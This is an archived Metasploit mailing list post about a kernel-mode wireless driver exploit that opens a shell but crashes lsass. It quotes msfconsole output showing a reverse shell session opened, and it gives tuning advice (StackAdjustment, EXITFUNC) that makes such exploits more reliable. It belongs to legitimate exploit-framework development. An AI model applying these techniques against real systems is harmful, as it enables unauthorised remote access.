Metasploit mailing list archives
Mistake in kernel mode payloads
From: mmiller at hick.org (Matt Miller)
Date: Tue, 11 Mar 2008 13:45:53 -0700
On Tue, Mar 11, 2008 at 08:43:41PM +0100, Giuseppe Gottardi wrote:
On Wed, Feb 27, 2008 at 1:34 AM, <mmiller at hick.org> wrote:What is EXITFUNC set to when you run your exploit? In general, the stager assumes that the user-mode payload will take care of cleanup. Currently, this typically involves a call to ExitProcess, ExitThread, or generating an exception (depending on EXITFUNC). If your EXITFUNC is set to seh this will likely cause lsass to crash in the manner that you're seeing.msf exploit(intel_2200BG_probe) > rexploit [*] Started reverse handler [*] Sending probe exploit to 00:0e:35:95:7b:45... [-] #################################################################################################################[*] Sending stage (474 bytes) [*] Command shell session 2 opened (192.168.33.212:4444 -> 192.168.33.159:1085) # [*] Completed sending probe. (lsass.exe die)
The most likely reason for this has to do with available stack space for the stager. Try setting 'StackAdjustment' => -3500 in your 'Payload' information hash (take a look at windows/smb/ms06_040_netapi for an example). In general, if you use a staged payload and receive a connection but the process crashes, it may be indicative of the stager attempting to read more data than is available on the stack (leading to the call to recv failing and the process crashing). We have thought about making StackAdjustment default for Windows exploits and may do that in the future. The other wifi driver exploits most likely need to have this added as well for reliability.
Current thread:
- Mistake in kernel mode payloads Giuseppe Gottardi (Feb 26)
- Mistake in kernel mode payloads mmiller at hick.org (Feb 26)
- Mistake in kernel mode payloads Giuseppe Gottardi (Mar 11)
- Mistake in kernel mode payloads Matt Miller (Mar 11)
- Mistake in kernel mode payloads Giuseppe Gottardi (Mar 11)
- Mistake in kernel mode payloads mmiller at hick.org (Feb 26)